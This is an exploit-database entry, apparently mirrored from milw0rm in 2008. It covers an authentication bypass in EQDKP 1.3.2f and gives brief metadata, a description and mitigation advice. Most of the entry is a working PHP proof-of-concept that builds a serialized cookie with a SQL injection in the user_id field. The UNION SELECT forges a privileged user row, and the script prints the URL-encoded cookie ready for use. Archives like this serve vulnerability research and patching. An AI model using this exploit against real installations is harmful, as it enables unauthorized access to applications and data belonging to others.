EQDKP 1.3.2f Authentication Bypass (PoC)

vendor:

EQDKP

by:

vort.fu@gmail.com

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: EQDKP

Affected Version From: 1.3.2f

Affected Version To: 1.3.2f

Patch Exists: YES

Related CWE: N/A

CPE: a:eqdkp:eqdkp:1.3.2f

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

EQDKP 1.3.2f Authentication Bypass (PoC)

EQDKP 1.3.2f is vulnerable to an authentication bypass vulnerability. By crafting a malicious cookie, an attacker can bypass authentication and gain access to the application. This vulnerability is due to the application not properly validating user-supplied input.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of EQDKP.

Source

Exploit-DB raw data:

<?php
   // EQDKP 1.3.2f Authentication Bypass (PoC)
   // vort.fu@gmail.com
 
   $data['auto_login_id'] = 'x';
   $data['user_id']       = "1' " .
                            "UNION SELECT " .
                               "1, " .         // * user_id
                               "'a', " .       // username
                               "'x', " .       // * user_password
                               "'', " .        // user_email
                               "1, " .         // user_alimit
                               "1, " .         // user_elimit
                               "1, " .         // user_ilimit
                               "1, " .         // user_nlimit
                               "1, " .         // user_rlimit
                               "1, " .         // user_style
                               "'english', " . // user_lang
                               "NULL, " .      // user_key
                               "1, " .         // user_lastvisit
                               "NULL, " .      // user_lastpage
                               "1, " .         // * user_active
                               "NULL, " .      // user_newpassword
                               "NULL " .       // session_current
                            "ORDER BY " .
                               "username ASC" .
                            "/*";
 
   $cookie = serialize($data);
   echo "eqdkp_data\n\n";
 
   for($i = 0; $i < strlen($cookie); $i++)
      echo '%' . bin2hex($cookie[$i]);
 
   echo "\n\n";
?> 

# milw0rm.com [2008-05-13]